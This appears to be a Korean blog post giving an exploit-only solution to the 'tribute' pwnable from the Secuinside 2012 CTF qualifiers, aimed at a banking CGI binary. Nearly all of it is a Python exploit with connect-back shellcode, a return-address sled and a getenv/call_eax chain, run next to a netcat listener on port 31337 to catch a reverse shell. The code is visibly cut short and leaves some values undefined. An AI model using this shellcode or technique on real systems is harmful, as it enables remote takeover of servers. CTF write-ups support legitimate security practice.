Category : Pwnables
nickname: tribute
HINT: http://61.42.25.18/banking/
binary: http://61.42.25.18/banking/secureKey.tgz
CentOS 6.2 / randomize_va_space 2 / exec-shield 0 |
secureKey.cgiSummary : invalid use of the index
#!/usr/bin/python from socket import * HOST = "127.0.0.1" p = lambda x : pack("<L" , x) SHELLCODE = "\x90"*16 + "\x31\xc9\x31\xdb\x31\xc0\xb0\x66\x53\x43\x53\x43\x53\x4b\x89\xe1\xcd\x80"+\ call_eax = 0x0804878B data = p(ret)*1997 + p(getenv_plt) + p(call_eax) + p(env) + "\x90"*(100-len(SHELLCODE))+SHELLCODE+"\r\n" payload = ""
s.close() |
pwn3r@localhost:~/secuinside/quals/tribute$ ./exploit.py & nc -lvp 31337 |
'CTF' 카테고리의 다른 글
| Secuinside 2012 Quals - Classico (Exploit only) (0) | 2012.10.07 |
|---|---|
| Secuinside 2012 Quals - Roadie (Exploit only) (0) | 2012.10.07 |
| Secuinside 2012 Quals - Dethstarr (Exploit only) (0) | 2012.10.07 |
| 2011 Holy-Shield Hacking Festival Report (4) | 2011.11.29 |
| ISEC 2010 본선 CTF - sonic (0) | 2011.10.14 |
